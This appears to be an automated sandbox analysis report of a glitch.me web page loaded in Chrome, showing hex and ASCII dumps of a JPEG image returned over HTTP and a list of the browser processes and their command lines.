                                                                                                                                                                                                            2024-11-06 05:29:57 UTC625INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                                            Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 44 33 44 41 35 33 46 39 35 33 42 44 31 31 45 46 42 31 35 36 41 39 44 44 38 35 33 35 42 37 34 37 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 39 64 37 36 31 61 63 2d 61 63 36 65 2d 34 65 63 64 2d 61 65 32 34 2d 65 62 38 65 34 37 32 65 35 64 35 63 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 65 63 30 36 63 34 63 2d 37 64 66 38 2d 65 61 34 63 2d 38 32 38
                                                                                                                                                                                                            Data Ascii: pMM:InstanceID="xmp.iid:D3DA53F953BD11EFB156A9DD8535B747" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:69d761ac-ac6e-4ecd-ae24-eb8e472e5d5c" stRef:documentID="adobe:docid:photoshop:6ec06c4c-7df8-ea4c-828
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e 08 47 04 23 82 11 c1 08 e0 84 70 42 38 21 1c 10 8e
                                                                                                                                                                                                            Data Ascii: G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!G#pB8!
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: d9 7d e8 7c 48 ff 00 cc b7 d9 3f f8 d7 ff 00 0e 79 6f fb 07 87 f1 bf 0b fd af dd 9f c2 bb fc 07 c5 99 fb ac 3f 4a 1f 12 07 ea 57 ec 99 f4 f3 5f fc 39 e5 9f ec 1e 1f c6 fc 2f f6 bf 76 7f 0a e7 f0 3f 14 fd 97 de 87 c4 bd ff 00 cc a7 d9 4f 5f f7 d3 ff 00 0e f9 67 fb 0b 87 f1 bf 0b fd af dd 9f c2 a4 7c 03 c5 86 75 7d f8 7c 4b df fc c9 fd 95 ff 00 8d 3f f0 ef 95 ff 00 b0 b8 7f 1c f0 bf da fd d9 fc 2a 3f c0 fc 53 f6 5f 7a 1f 12 f7 ff 00 32 5f 65 bf e3 3f fc 3b e5 7f ec 2e 73 f8 e7 85 e5 de fd d9 fc 2b a3 c0 7c 54 87 15 61 fa 50 f8 91 ff 00 99 2f b2 df f1 9f fe 1d f2 bf f6 17 0f e3 9e 17 fb 5f bb 3f 85 07 c0 7c 54 7f ba fb d0 f8 97 bf f9 90 fb 2f ff 00 19 ff 00 e1 df 2b ff 00 61 73 bf c6 fc 2f f6 bf 76 7f 0a e7 f0 2f 15 67 ee b0 fd 28 7c 4b df fc c8 7d 97 ff 00
                                                                                                                                                                                                            Data Ascii: }|H?yo?JW_9/v?O_g|u}|K?*?S_z2_e?;.s+|TaP/_?|T/+as/v/g(|K}
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 8f f3 ea 38 7e 2b f0 0f f1 1f 72 cf 81 1f 86 3c 73 f6 1f 7e bf 8d 1f f3 d7 ed 59 f4 f2 91 ff 00 ce 4f 22 ff 00 64 70 fc 57 e0 1f e2 3e e5 9f 02 3f 0c f8 e7 ec 3e fd 7f 1a 3f e7 a7 da bf f8 a7 fe e4 f2 2f f6 47 0f c5 7e 01 fe 23 ee 59 f0 20 7c b1 e3 87 2a 3e fd 7f 1a 3f e7 a7 da bf f8 a7 fe e4 f2 2f f6 47 38 7e 6c f9 7e 39 ee 3f bb b3 e0 5d fc 31 e3 8e dd c6 3f a7 5f c6 bd ff 00 9e 9f 6a ff 00 e2 9f fb 93 c8 bf d9 1c 07 cd bf 2f 1c b7 1f 72 cf 81 73 f0 c7 8e 7e c3 ef d7 f1 a3 fe 7a 7d ab ff 00 8a 7f ee 4f 23 ff 00 64 70 fc 5b f2 f7 f8 8f ee ed f8 11 f8 63 c7 3f 61 f7 eb f8 d1 ff 00 3c fe d6 7f c5 23 ff 00 9c be 45 fe c8 e7 3f 17 7c bd fe 23 fb bb 7e 05 df c2 fe 3a ed dc 7d fa fe 35 ef fc f2 fb 5a 7f fa 28 ff 00 b9 7c 8b fd 93 c3 f1 77 cb df e2 3f bb b7 e0
                                                                                                                                                                                                            Data Ascii: 8~+r<s~YO"dpW>?>?/G~#Y |*>?/G8~l~9?]1?_j/rs~z}O#dp[c?a<#E?|#~:}5Z(|w?
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 00 9f af e7 8c 67 fc dc ea 90 1c f2 0b 21 37 41 d7 a7 c3 d0 f5 fd b9 f4 e0 42 08 62 cb 31 31 3f 1c 7e 40 7e 1f 89 fc b9 59 18 b9 c9 0b 60 9b d7 f3 fe df ed f4 e4 38 95 28 c7 16 59 7b ff 00 9f 4f 5f 8e 3f e9 8e 0b a6 05 b0 cd 66 b6 0f af 77 fe cc 75 e7 18 29 18 86 65 97 d4 1e bd 7a 7e 47 3c 00 60 c8 11 0c 39 85 b1 6c 8c af f9 f9 13 0e 4b ac b6 0b 3d c4 80 46 3e 19 f8 e7 d3 fc bc 89 8b 0c 57 08 e6 b3 59 c1 f8 8f f2 75 fc 87 38 cd 9a 19 87 4a cf ea 31 f1 e9 81 d7 38 e0 a3 a5 1f 51 f8 7a 7e 3d 7a fa 63 1f 80 e5 53 8f 20 a4 81 37 e7 d4 e7 fe 9e bd 3a f2 38 37 4a ea cc 4e 3a e4 e3 d7 e3 9c fe 5c 91 81 01 d0 bd 13 e7 fc 5d 7d 7e 19 3f fa f3 c8 80 4e 4a 5a 4b 3a 3e a0 75 1e 9d 47 fd 3f b7 9d 66 cd 4a 20 b3 94 0b 1d 33 e9 90 3e 1f 1f c4 72 12 89 90 21 4b 4e 2e 73
                                                                                                                                                                                                            Data Ascii: g!7ABb11?~@~Y`8(Y{O_?fwu)ez~G<`9lK=F>WYu8J18Qz~=zcS 7:87JN:\]}~?NJZK:>uG?fJ 3>r!KN.s
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 1a 01 2e 32 56 02 e3 05 90 9c 01 ea 3f f6 75 c7 4f 43 c3 bb 0b ab 67 d4 0c f5 6f ec fe ce 9d 3f 1c f0 30 1c 10 ea 31 fb ab f7 87 c4 3e d0 f8 dd bf 24 f2 cd 9d 6d 7d 2a b1 34 f2 cb 66 51 1c 71 c4 80 96 77 62 7a 0f c3 90 97 66 5a 78 9c 93 5b 5d ac b7 53 d1 1c f8 74 a8 87 ec 07 eb 0f ed 67 ea 19 6e cb e0 3b fd 7e e6 b5 3b 52 53 9a 6a 93 2e 63 96 3e 84 b2 12 ae 11 bd 54 e3 04 75 1c 88 85 da 75 d9 5c e1 11 fd 20 46 6b 57 7d e0 1b bd 9d 31 ba 51 26 12 0e 24 31 8b 75 f3 7c 15 b2 16 01 1f 29 c8 3d 72 0e 47 ed e9 8c f3 ab 07 ad 6d 16 7d 01 39 eb fd b9 c7 e7 f0 e4 0c 18 64 b9 82 cb ea 87 ed 03 e3 fd ff 00 9f 38 20 5b 14 00 bd fa 91 d3 04 7e 78 f8 75 ff 00 26 79 1d 2c 54 a0 31 75 ef d4 8f fd 59 cf ec 3f e5 e7 5b 1e 95 26 08 fa 91 9c 77 0f 5f ed ff 00 a6 78 08 36 58
                                                                                                                                                                                                            Data Ascii: .2V?uOCgo?01>$m}*4fQqwbzfZx[]Stgn;~;RSj.c>Tuu\ FkW}1Q&$1u|)=rGm}9d8 [~xu&y,T1uY?[&w_x6X
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 4f 35 02 46 63 35 b1 6c 75 5e b9 3e 9d 4e 71 eb f9 72 32 8e 1f ec a9 39 70 78 95 bf ea 07 51 dd d3 d7 a1 f8 74 e4 18 64 ca cc 33 5e 8b 00 81 92 3a fc 4f fd 07 4e 44 c0 64 80 5f 10 b6 7b f9 ea 3f bb 3d 7e 00 f5 e7 34 60 a4 08 7c 72 5e fb f8 f8 f5 cf 4c 7e cc f0 15 45 99 47 56 2b 62 d8 f4 f9 bd 7d 7a f5 fe df fa 67 9c ee c7 0c 97 5d 67 f5 07 19 ce 3e 18 f5 fc 4e 72 7d 4f 3a 6a 04 31 43 95 98 b1 f9 fa 7e 7e a7 ff 00 6f 28 ee fa d7 5d 6c 16 33 d7 bb af e1 9e bf fa 09 3c e9 af 07 e2 81 86 4b 60 b3 8f 53 9e b9 3f e5 f8 fa 67 1c e7 74 ec d9 ae 89 32 c8 59 f4 39 1d 7d 41 eb fd a7 f6 72 06 a3 d0 bb ab d0 b3 5b 1f fa fa e4 63 fb 47 20 2a 63 96 2b a2 4e 59 7c 76 fe b1 1a 8b 5b ef b1 3b 1a 34 76 16 22 9a 68 6b c9 25 5a b3 7b 4f 20 86 65 93 da 7c 30 3d 92 76 e1 81 e8
                                                                                                                                                                                                            Data Ascii: O5Fc5lu^>Nqr29pxQtd3^:ONDd_{?=~4`|r^L~EGV+b}zg]g>Nr}O:j1C~~o(]l3<K`S?gt2Y9}Ar[cG *c+NY|v[;4v"hk%Z{O e|0=v
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: 0f 93 b2 cb dd 3f 88 f4 f8 7f 9b f0 1d 79 dd 04 07 56 cc b6 03 26 59 7b df 1c fe df cb a7 f7 f2 20 13 96 4a 0f 11 0d 3c 4a cc 4d e8 41 cf c7 f2 fd b8 fc f8 74 23 54 87 64 af 7d dc 63 e3 f8 9c fa fe 7f 8f a8 e0 ad 10 01 df 32 b2 12 fa 10 7f 0c 83 fb 3a 63 f2 3c e3 0f 32 eb 08 85 b5 67 19 07 3e 83 fb ff 00 67 43 e9 ca a5 5b 7b ab ac b3 13 fe 78 07 1f fb 01 e0 2a e6 50 cb d1 39 c9 cf a1 f5 e9 f8 fe 20 fc 40 e4 8d 43 4f 67 35 3d 23 47 4b ac bd ee 99 c9 fd a7 af e5 d0 7a 1e 56 21 22 59 41 02 7c f4 ce 3f cd 9f 8f 53 e9 ce f7 72 40 1c f2 59 fb e3 1e a3 a7 a7 af f9 bd 79 cd 32 76 28 65 98 9b a0 eb 8f cf 3f 1f 4c fe 63 91 38 12 38 a3 da a3 eb 2f b0 a5 f7 2b 5b 3a c8 bf ca 76 fa 09 ab cc 85 f0 56 fd 67 ee 46 58 ff 00 75 bb 97 d7 e3 c5 a5 12 2e 12 07 b2 42 bc 1d 7b
                                                                                                                                                                                                            Data Ascii: ?yV&Y{ J<JMAt#Td}c2:c<2g>gC[{x*P9 @COg5=#GKzV!"YA|?Sr@Yy2v(e?Lc88/+[:vVgFXu.B{
                                                                                                                                                                                                            2024-11-06 05:29:57 UTC1369INData Raw: cb 1f ab 39 fc bf cb f8 e7 fb b9 29 d6 19 73 56 00 fa 56 42 d9 f9 4f e3 fd 87 f3 f4 f4 c0 e4 05 6c 71 c9 1a 97 bf 58 4f f7 f4 f5 e9 8f ed e4 45 67 8a e9 93 75 af ba bc fd d9 7e 04 8e 08 51 3f df ab 30 d3 fb 1b f7 9e e5 89 04 55 ea 7d a7 fb 8b 66 79 58 80 b1 c3 07 88 6e 25 96 46 27 a0 08 8a 49 fd 9c aa ef ec 67 fa 27 d8 99 d9 96 dd d4 7f f9 91 fe b0 5f cd dd af 23 d5 53 d7 b6 ce 6b b1 7d 1a a2 b9 9d 64 52 a5 58 64 75 f8 05 07 3c c1 11 8e 92 42 f7 e3 59 1d 2d e4 ff 00 4a ce 87 91 ea 76 35 45 ba b7 e0 96 16 ff 00 1a c8 bd 07 c3 a1 27 3d c3 91 d2 f1 70 ba fa bd d6 21 28 4b b6 a3 5e 13 3c f6 e1 86 0e d0 7b e4 75 00 80 7d 01 3d 58 f5 e7 3b b9 3e 4a 41 c8 ec 85 cd 0f 92 69 66 85 a6 8b 69 4d a3 52 03 66 51 d3 3d 31 80 72 3f 3e 46 40 1c 38 2e 0d 5c 42 e9 af e4 1a
                                                                                                                                                                                                            Data Ascii: 9)sVVBOlqXOEgu~Q?0U}fyXn%F'Ig'_#Sk}dRXdu<BY-Jv5E'=p!(K^<{u}=X;>JAifiMRfQ=1r?>F@8.\B


                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:00:28:36
                                                                                                                                                                                                            Start date:06/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                            Start time:00:28:39
                                                                                                                                                                                                            Start date:06/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2164,i,9098095843155022011,1846821648532487114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:00:28:42
                                                                                                                                                                                                            Start date:06/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://astonishing-maize-sunstone.glitch.me/"
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            No disassembly